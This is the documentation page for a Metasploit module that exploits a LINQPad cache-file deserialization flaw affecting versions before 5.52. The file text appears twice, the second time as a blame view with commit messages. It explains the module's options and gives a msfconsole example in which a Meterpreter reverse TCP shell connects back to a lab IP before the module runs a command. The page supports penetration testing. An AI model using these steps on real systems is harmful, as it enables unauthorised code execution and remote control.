documentation/modules/exploit/windows/local/linqpad_deserialization.md

## LINQPad 5.48 Deserialization

LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/).

## Verification Steps
Steps:

1. Install the application
2. Start msfconsole
3. Get Meterpreter/cmd shell
4. Run: `use windows/local/linqpad_deserialization`
5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
5. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
6. Run exploit

## Options

### cleanup

Enable cleanup of malicious file. The module will replace cache filewith malicious content. If `cleanup` is enabled, after successful execution, the module will remove malicious cache file. The original file will be restored upon re-execution of Linqpad.


### cache\_path

The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file. 

### linqpad\_path

Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.

Example:

```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set LHOST 192.168.95.128
msf exploit(multi/handler) > set LPORT 4242
msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.95.128:4242 
[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use windows/local/linqpad_deserialization
msf exploit(windows/local/linqpad_deserialization) > set LINQPAD_FILE C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe
msf exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd
msf exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad
msf exploit(windows/local/linqpad_deserialization) > set CMD calc.exe
msf exploit(windows/local/linqpad_deserialization) > set session 1
msf exploit(windows/local/linqpad_deserialization) > exploit
[*] Exploit completed, but no session was created.
```

Previous example will run `calc.exe` when LINQPad will start.
LINQPad deserialization module init 2024-12-30 15:57:59 +01:00			`## LINQPad 5.48 Deserialization`

			`LINQPad is a scratchpad for .NET programming. Versions prior to 5.52 contain a deserialization vulnerability in processing cache file when program is starting. Application can be downloaded from [here](https://www.linqpad.net/).`

			`## Verification Steps`
			`Steps:`

			`1. Install the application`
			`2. Start msfconsole`
			`3. Get Meterpreter/cmd shell`
			4. Run: `use windows/local/linqpad_deserialization`
			5. Set payload - for example `set payload cmd/windows/generic` - and corresponding parameters
Refactoring based on comments 2025-05-06 08:43:57 +02:00			5. Set parameters `session`, `cache_path`, `linqpad_path`, `cleanup`
LINQPad deserialization module init 2024-12-30 15:57:59 +01:00			`6. Run exploit`

			`## Options`

Adds cleanup option in documentation 2025-05-06 09:07:21 +02:00			`### cleanup`

			Enable cleanup of malicious file. The module will replace cache filewith malicious content. If `cleanup` is enabled, after successful execution, the module will remove malicious cache file. The original file will be restored upon re-execution of Linqpad.


LINQPad deserialization module init 2024-12-30 15:57:59 +01:00			`### cache\_path`

			`The parameter sets path for folder, where vulnerable cache file is present. This is crucial part of the exploit as the folder can be used to identify whether the current version is vulnerable and the payload delivery is performed through cache file.`

			`### linqpad\_path`

			Final part of exploit runs the LINQPad to trigger deserialization procedure. The `linpad_path` parameter sets the path to LINQPad binary, which is ran at the end of exploit.

			`Example:`

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/multi/handler`
			`msf exploit(multi/handler) > set LHOST 192.168.95.128`
			`msf exploit(multi/handler) > set LPORT 4242`
			`msf exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp`
			`msf exploit(multi/handler) > run`
LINQPad deserialization module init 2024-12-30 15:57:59 +01:00			`[*] Started reverse TCP handler on 192.168.95.128:4242`
			`[*] Meterpreter session 1 opened (192.168.95.128:4242 -> 192.168.95.130:53430) at 2024-12-30 12:46:16 +0100`

			`meterpreter > background`
			`[*] Backgrounding session 1...`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(multi/handler) > use windows/local/linqpad_deserialization`
			`msf exploit(windows/local/linqpad_deserialization) > set LINQPAD_FILE C:/ProgramData/LINQPad/Updates50.AnyCPU/552/LINQPad.exe`
			`msf exploit(windows/local/linqpad_deserialization) > set payload windows/exec/cmd`
			`msf exploit(windows/local/linqpad_deserialization) > set cache_path C:/Users/ms/AppData/Local/LINQPad`
			`msf exploit(windows/local/linqpad_deserialization) > set CMD calc.exe`
			`msf exploit(windows/local/linqpad_deserialization) > set session 1`
			`msf exploit(windows/local/linqpad_deserialization) > exploit`
LINQPad deserialization module init 2024-12-30 15:57:59 +01:00			`[*] Exploit completed, but no session was created.`
			```

			Previous example will run `calc.exe` when LINQPad will start.